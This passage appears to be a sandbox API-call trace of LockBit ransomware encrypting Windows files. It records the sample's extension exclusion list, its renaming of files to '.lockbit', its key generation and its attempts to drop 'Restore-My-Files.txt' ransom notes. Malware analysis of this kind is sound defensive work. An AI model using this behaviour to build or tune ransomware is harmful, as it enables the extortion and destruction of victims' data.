lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.255] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.255] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF.lockbit") returned 72 [0154.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282928.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.257] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.257] malloc (_Size=0x40068) returned 0x3df0008 [0154.257] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33126) returned 1 [0154.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.259] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.358] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.358] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.358] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.361] free (_Block=0x1fa2ed8) [0154.361] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282928.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.361] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.362] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3700, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0282932.WMF", cAlternateFileName="")) returned 1 [0154.362] lstrcmpiW (lpString1=".", lpString2="J0282932.WMF") returned -1 [0154.362] lstrcmpiW (lpString1="..", lpString2="J0282932.WMF") returned -1 [0154.362] PathFindExtensionW (pszPath="J0282932.WMF") returned=".WMF" [0154.362] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.362] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.363] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.363] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0282932.WMF") returned 1 [0154.364] lstrcmpiW (lpString1="ntldr", lpString2="J0282932.WMF") returned 1 [0154.364] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0282932.WMF") returned 1 [0154.364] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0282932.WMF") returned -1 [0154.364] lstrcmpiW (lpString1="autorun.inf", lpString2="J0282932.WMF") returned -1 [0154.364] lstrcmpiW (lpString1="thumbs.db", lpString2="J0282932.WMF") returned 1 [0154.364] lstrcmpiW (lpString1="iconcache.db", lpString2="J0282932.WMF") returned -1 [0154.364] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.364] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF") returned=".WMF" [0154.364] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.364] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.364] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.365] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.365] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF.lockbit") returned 72 [0154.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0282932.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0154.370] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.370] malloc (_Size=0x40068) returned 0x1ff1e60 [0154.370] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14080) returned 1 [0154.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0154.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0154.371] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.373] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.373] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.373] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.374] free (_Block=0x1fa2ed8) [0154.374] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0282932.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.374] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.374] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56641810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x388a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285462.WMF", cAlternateFileName="")) returned 1 [0154.375] lstrcmpiW (lpString1=".", lpString2="J0285462.WMF") returned -1 [0154.375] lstrcmpiW (lpString1="..", lpString2="J0285462.WMF") returned -1 [0154.375] PathFindExtensionW (pszPath="J0285462.WMF") returned=".WMF" [0154.375] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.375] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.376] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.376] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285462.WMF") returned 1 [0154.377] lstrcmpiW (lpString1="ntldr", lpString2="J0285462.WMF") returned 1 [0154.377] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285462.WMF") returned 1 [0154.377] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285462.WMF") returned -1 [0154.377] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285462.WMF") returned -1 [0154.377] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285462.WMF") returned 1 [0154.377] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285462.WMF") returned -1 [0154.377] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.377] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF") returned=".WMF" [0154.377] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.377] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.377] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.378] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.378] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF.lockbit") returned 72 [0154.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285462.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0154.382] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.382] malloc (_Size=0x40068) returned 0x3d70450 [0154.383] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=14474) returned 1 [0154.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0154.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0154.384] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.386] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.386] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.388] free (_Block=0x1fa2ed8) [0154.388] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285462.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.388] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.388] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56641810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2440, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285484.WMF", cAlternateFileName="")) returned 1 [0154.388] lstrcmpiW (lpString1=".", lpString2="J0285484.WMF") returned -1 [0154.388] lstrcmpiW (lpString1="..", lpString2="J0285484.WMF") returned -1 [0154.388] PathFindExtensionW (pszPath="J0285484.WMF") returned=".WMF" [0154.388] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.388] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.389] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 